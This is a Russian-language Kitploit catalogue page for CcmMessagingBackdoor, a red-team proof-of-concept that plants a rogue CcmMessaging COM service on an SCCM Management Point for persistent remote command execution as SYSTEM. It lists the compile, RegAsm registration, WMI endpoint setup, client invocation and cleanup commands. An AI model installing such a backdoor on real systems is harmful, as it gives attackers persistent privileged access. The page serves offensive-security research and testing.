Skip to content
KitploitKITPLOIT
ИнструментыБлог
Отправить
ИнструментыБлог
Отправить

Инструменты для хакинга, пентеста и кибербезопасности — ваш арсенал защиты!

Kitploit — это каталог инструментов для хакинга, кибербезопасности и пентестинга. Находите последние обновления проектов для поиска уязвимостей, анализа систем, автоматизации тестирования и усиления вашей безопасности.

··Ленты·Контакты·Конфиденциальность·© 2026 Kitploit

Каталог инструментов

Категории

Все категории
Loading categories
CcmMessagingBackdoor — Proof-of-concept бэкдор для SCCM Management Point, использующий поддельный COM-сервис для постоянного удаленного выполнения команд от имени SYSTEM. | Kitploit
Инструменты/GitHubGitHub/synacktiv/ccmmessagingbackdoor
Механизмы персистентностиПост-эксплуатацияКомандование и УправлениеRed TeamingИнструмент Удаленного ДоступаРазработка Полезной Нагрузки
GitHubsynacktiv/ccmmessagingbackdoor

CcmMessagingBackdoor

Proof-of-concept бэкдор для SCCM Management Point, использующий поддельный COM-сервис для постоянного удаленного выполнения команд от имени SYSTEM.

Популярное

Смотреть все →

Откройте для себя самые используемые инструменты нашего сообщества.

Изучить все инструменты

Просмотрите нашу коллекцию инструментов

Смотреть все инструменты →
Поделиться
Репозиторий
1921 год назадЕщё не проверено

CcmMessagingBackdoor

Инструменты Proof of Concept для создания и установки поддельной службы CcmMessaging с целью сохранения доступа к Management Point

Использование

  • Скомпилируйте и установите поддельную COM-службу на Management Point
root@kitploit:~
# Compile
PS C:\> C:\Windows\Microsoft.NET\Framework64\v2.0.50727\csc.exe /t:library /out:c:\rogue.dll RogueCcmEndpoint.cs

# Register CLSID
PS C:\> C:\Windows\Microsoft.NET\Framework64\v2.0.50727\RegAsm.exe /codebase c:\rogue.dll
  • Настройте конечную точку службы в WMI
root@kitploit:~
PS C:\>  ./wmi_create_rogue_service_endpoint.ps1
  • Используйте Python-клиент для выполнения команд PowerShell
root@kitploit:~
$ python3 ccmmessaging_backdoor_client.py -t https://mp.corp.local -s MP_Backdoor 'whoami'
[...]
<BackdoorResponse>nt authority\system
</BackdoorResponse>
  • Для очистки
root@kitploit:~
# Unregister CLSID
PS C:\> C:\Windows\Microsoft.NET\Framework64\v2.0.50727\RegAsm.exe /unregister c:\rogue.dll

PS C:\> ./wmi_remove_rogue_service_endpoint.ps1

TODO

  • Исправить случайный сбой процесса CcmExec (причина пока неизвестна)
Скачать инструмент